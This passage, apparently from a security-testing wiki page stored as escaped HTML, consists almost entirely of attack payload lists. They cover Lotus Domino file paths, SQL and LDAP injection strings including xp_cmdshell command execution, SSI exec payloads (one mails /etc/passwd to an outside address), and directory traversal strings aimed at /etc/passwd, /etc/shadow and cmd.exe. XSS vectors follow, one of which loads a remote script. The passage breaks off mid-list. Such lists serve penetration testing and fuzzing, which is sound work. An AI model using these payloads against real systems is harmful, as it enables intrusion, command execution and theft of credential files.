/msdwda.nsf&lt;br /&gt;
/mtatbls.nsf&lt;br /&gt;
/mtstore.nsf&lt;br /&gt;
/names.nsf&lt;br /&gt;
/nntppost.nsf&lt;br /&gt;
/nntp/nd000001.nsf&lt;br /&gt;
/nntp/nd000002.nsf&lt;br /&gt;
/nntp/nd000003.nsf&lt;br /&gt;
/ntsync45.nsf&lt;br /&gt;
/perweb.nsf&lt;br /&gt;
/qpadmin.nsf&lt;br /&gt;
/quickplace/quickplace/main.nsf&lt;br /&gt;
/reports.nsf&lt;br /&gt;
/sample/siregw46.nsf&lt;br /&gt;
/schema50.nsf&lt;br /&gt;
/setupweb.nsf&lt;br /&gt;
/setup.nsf&lt;br /&gt;
/smbcfg.nsf&lt;br /&gt;
/smconf.nsf&lt;br /&gt;
/smency.nsf&lt;br /&gt;
/smhelp.nsf&lt;br /&gt;
/smmsg.nsf&lt;br /&gt;
/smquar.nsf&lt;br /&gt;
/smsolar.nsf&lt;br /&gt;
/smtime.nsf&lt;br /&gt;
/smtpibwq.nsf&lt;br /&gt;
/smtpobwq.nsf&lt;br /&gt;
/smtp.box&lt;br /&gt;
/smtp.nsf&lt;br /&gt;
/smvlog.nsf&lt;br /&gt;
/srvnam.htm&lt;br /&gt;
/statmail.nsf&lt;br /&gt;
/statrep.nsf&lt;br /&gt;
/stauths.nsf&lt;br /&gt;
/stautht.nsf&lt;br /&gt;
/stconfig.nsf&lt;br /&gt;
/stconf.nsf&lt;br /&gt;
/stdnaset.nsf&lt;br /&gt;
/stdomino.nsf&lt;br /&gt;
/stlog.nsf&lt;br /&gt;
/streg.nsf&lt;br /&gt;
/stsrc.nsf&lt;br /&gt;
/userreg.nsf&lt;br /&gt;
/vpuserinfo.nsf&lt;br /&gt;
/webadmin.nsf&lt;br /&gt;
/web.nsf&lt;br /&gt;
/.nsf/../winnt/win.ini&lt;br /&gt;
/?Open &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== SQL Injection -(Update: 11 August 2009 - Total Statements: 126)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
'sqlvuln&lt;br /&gt;
'+sqlvuln&lt;br /&gt;
sqlvuln;&lt;br /&gt;
(sqlvuln)&lt;br /&gt;
a' or 1=1--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 1=1--&amp;quot;&lt;br /&gt;
 or a = a&lt;br /&gt;
a' or 'a' = 'a&lt;br /&gt;
1 or 1=1&lt;br /&gt;
a' waitfor delay '0:0:10'--&lt;br /&gt;
1 waitfor delay '0:0:10'--&lt;br /&gt;
declare @q nvarchar (4000) select @q =&lt;br /&gt;
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A&lt;br /&gt;
0&lt;br /&gt;
031003000270000&lt;br /&gt;
declare @s varchar(22) select @s =&lt;br /&gt;
0x77616974666F722064656C61792027303A303A31302700 exec(@s)&lt;br /&gt;
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)&lt;br /&gt;
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e&lt;br /&gt;
exec(@s)&lt;br /&gt;
a'&lt;br /&gt;
?&lt;br /&gt;
' or 1=1&lt;br /&gt;
‘ or 1=1 --&lt;br /&gt;
x' AND userid IS NULL; --&lt;br /&gt;
x' AND email IS NULL; --&lt;br /&gt;
anything' OR 'x'='x&lt;br /&gt;
x' AND 1=(SELECT COUNT(*) FROM tabname); --&lt;br /&gt;
x' AND members.email IS NULL; --&lt;br /&gt;
x' OR full_name LIKE '%Bob%&lt;br /&gt;
23 OR 1=1&lt;br /&gt;
'; exec master..xp_cmdshell 'ping 172.10.1.255'--&lt;br /&gt;
'&lt;br /&gt;
'%20or%20''='&lt;br /&gt;
'%20or%20'x'='x&lt;br /&gt;
%20or%20x=x&lt;br /&gt;
')%20or%20('x'='x&lt;br /&gt;
0 or 1=1&lt;br /&gt;
' or 0=0 --&lt;br /&gt;
&amp;quot; or 0=0 --&lt;br /&gt;
or 0=0 --&lt;br /&gt;
' or 0=0 #&lt;br /&gt;
 or 0=0 #&amp;quot;&lt;br /&gt;
or 0=0 #&lt;br /&gt;
' or 1=1--&lt;br /&gt;
&amp;quot; or 1=1--&lt;br /&gt;
' or '1'='1'--&lt;br /&gt;
' or 1 --'&lt;br /&gt;
or 1=1--&lt;br /&gt;
or%201=1&lt;br /&gt;
or%201=1 --&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
 or 1=1 or &amp;quot;&amp;quot;=&lt;br /&gt;
' or a=a--&lt;br /&gt;
 or a=a&lt;br /&gt;
') or ('a'='a&lt;br /&gt;
) or (a=a&lt;br /&gt;
hi or a=a&lt;br /&gt;
hi or 1=1 --&amp;quot;&lt;br /&gt;
hi' or 1=1 --&lt;br /&gt;
hi' or 'a'='a&lt;br /&gt;
hi') or ('a'='a&lt;br /&gt;
&amp;quot;hi&amp;quot;&amp;quot;) or (&amp;quot;&amp;quot;a&amp;quot;&amp;quot;=&amp;quot;&amp;quot;a&amp;quot;&lt;br /&gt;
'hi' or 'x'='x';&lt;br /&gt;
@variable&lt;br /&gt;
,@variable&lt;br /&gt;
PRINT&lt;br /&gt;
PRINT @@variable&lt;br /&gt;
select&lt;br /&gt;
insert&lt;br /&gt;
as&lt;br /&gt;
or&lt;br /&gt;
procedure&lt;br /&gt;
limit&lt;br /&gt;
order by&lt;br /&gt;
asc&lt;br /&gt;
desc&lt;br /&gt;
delete&lt;br /&gt;
update&lt;br /&gt;
distinct&lt;br /&gt;
having&lt;br /&gt;
truncate&lt;br /&gt;
replace&lt;br /&gt;
like&lt;br /&gt;
handler&lt;br /&gt;
bfilename&lt;br /&gt;
' or username like '%&lt;br /&gt;
' or uname like '%&lt;br /&gt;
' or userid like '%&lt;br /&gt;
' or uid like '%&lt;br /&gt;
' or user like '%&lt;br /&gt;
exec xp&lt;br /&gt;
exec sp&lt;br /&gt;
'; exec master..xp_cmdshell&lt;br /&gt;
'; exec xp_regread&lt;br /&gt;
t'exec master..xp_cmdshell 'nslookup www.google.com'--&lt;br /&gt;
--sp_password&lt;br /&gt;
\x27UNION SELECT&lt;br /&gt;
' UNION SELECT&lt;br /&gt;
' UNION ALL SELECT&lt;br /&gt;
' or (EXISTS)&lt;br /&gt;
' (select top 1&lt;br /&gt;
'||UTL_HTTP.REQUEST&lt;br /&gt;
1;SELECT%20*&lt;br /&gt;
to_timestamp_tz&lt;br /&gt;
tz_offset&lt;br /&gt;
&amp;amp;lt;&amp;amp;gt;&amp;quot;'%;)(&amp;amp;amp;+&lt;br /&gt;
'%20or%201=1&lt;br /&gt;
%27%20or%201=1&lt;br /&gt;
%20$(sleep%2050)&lt;br /&gt;
%20'sleep%2050'&lt;br /&gt;
char%4039%41%2b%40SELECT&lt;br /&gt;
&amp;amp;amp;apos;%20OR&lt;br /&gt;
'sqlattempt1&lt;br /&gt;
(sqlattempt2)&lt;br /&gt;
|&lt;br /&gt;
%7C&lt;br /&gt;
*|&lt;br /&gt;
%2A%7C&lt;br /&gt;
*(|(mail=*))&lt;br /&gt;
%2A%28%7C%28mail%3D%2A%29%29&lt;br /&gt;
*(|(objectclass=*))&lt;br /&gt;
%2A%28%7C%28objectclass%3D%2A%29%29&lt;br /&gt;
(&lt;br /&gt;
%28&lt;br /&gt;
)&lt;br /&gt;
%29&lt;br /&gt;
&amp;amp;amp;&lt;br /&gt;
%26&lt;br /&gt;
!&lt;br /&gt;
%21&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
' or ''='&lt;br /&gt;
x' or 1=1 or 'x'='y&lt;br /&gt;
/&lt;br /&gt;
//&lt;br /&gt;
//*&lt;br /&gt;
*/*&lt;br /&gt;
a' or 3=3--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 3=3--&amp;quot;&lt;br /&gt;
' or 3=3&lt;br /&gt;
‘ or 3=3 --&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== SSI (Server Side Includes) - (Update: xx/xx/xx - Total Statements: 4)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;/bin/ls /&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;find / -name *.* -print&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;mail Foobar@email.de &amp;amp;lt;mailto:Foobar@email.de&amp;amp;gt; &amp;amp;lt; cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Directory Traversal - (Update: 11 August 2009 - Total Statements: 132)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../etc/passwd&lt;br /&gt;
../../../../../etc/passwd&lt;br /&gt;
../../../../etc/passwd&lt;br /&gt;
../../../etc/passwd&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
../../../.htaccess&lt;br /&gt;
../../.htaccess&lt;br /&gt;
../.htaccess&lt;br /&gt;
.htaccess&lt;br /&gt;
././.htaccess&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
../../../../../../../../../../../../etc/hosts%00&lt;br /&gt;
../../../../../../../../../../../../etc/hosts&lt;br /&gt;
../../boot.ini&lt;br /&gt;
/../../../../../../../../%2A&lt;br /&gt;
../../../../../../../../../../../../etc/passwd%00&lt;br /&gt;
../../../../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../../../../../etc/shadow%00&lt;br /&gt;
../../../../../../../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../etc/passwd^^&lt;br /&gt;
/../../../../../../../../../../etc/shadow^^&lt;br /&gt;
/../../../../../../../../../../etc/passwd&lt;br /&gt;
/../../../../../../../../../../etc/shadow&lt;br /&gt;
/./././././././././././etc/passwd&lt;br /&gt;
/./././././././././././etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/passwd&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/shadow&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
%0a/bin/cat%20/etc/passwd&lt;br /&gt;
%0a/bin/cat%20/etc/shadow&lt;br /&gt;
%00/etc/passwd%00&lt;br /&gt;
%00/etc/shadow%00&lt;br /&gt;
%00../../../../../../etc/passwd&lt;br /&gt;
%00../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.jpg&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.html&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/passwd\\&amp;amp;amp;apos;&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/shadow\\&amp;amp;amp;apos;&lt;br /&gt;
../../../../../../../../conf/server.xml&lt;br /&gt;
/../../../../../../../../bin/id|&lt;br /&gt;
C:/inetpub/wwwroot/global.asa&lt;br /&gt;
C:\inetpub\wwwroot\global.asa&lt;br /&gt;
C:/boot.ini&lt;br /&gt;
C:\boot.ini&lt;br /&gt;
../../../../../../../../../../../../localstart.asp%00&lt;br /&gt;
../../../../../../../../../../../../localstart.asp&lt;br /&gt;
../../../../../../../../../../../../boot.ini%00&lt;br /&gt;
../../../../../../../../../../../../boot.ini&lt;br /&gt;
/./././././././././././boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00&lt;br /&gt;
/../../../../../../../../../../../boot.ini&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../boot.ini&lt;br /&gt;
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.html&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.jpg&lt;br /&gt;
/.../.../.../.../.../&lt;br /&gt;
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
''Sorry for breaking the layout - but &amp;quot;breaking the layout&amp;quot; could become &amp;quot;breaking the software&amp;quot;.'' &lt;br /&gt;
&lt;br /&gt;
=== XSS Statements - Most effective/most common statements  ===&lt;br /&gt;
&lt;br /&gt;
Testing Statements &lt;br /&gt;
&amp;lt;pre&amp;gt;';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//&amp;quot;;alert(String.fromCharCode(88,83,83))//\&amp;quot;;alert(String.fromCharCode(88,83,83))//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt; &lt;br /&gt;
'';!--&amp;quot;&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
Common exploit code (covers a lot of XSS vulnerabilities) &lt;br /&gt;
&amp;lt;pre&amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt='&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=&amp;quot;&lt;br /&gt;
\'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=\'&lt;br /&gt;
'); alert('xss'); var x='&lt;br /&gt;
\\'); alert(\'xss\');var x=\'&lt;br /&gt;
//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83));&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== XSS Statements (Full List) - (Update: 11 August 2009 - Total Statements: 162) &lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=JaVaScRiPt:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=javascript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=`javascript:alert(&amp;quot;&amp;quot;RSnake says, 'XSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG &amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;ascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;IMG SRC=java\0script:alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;SCR\0IPT&amp;amp;gt;alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;lt;/SCR\0IPT&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot; &amp;amp;amp;#14;  javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
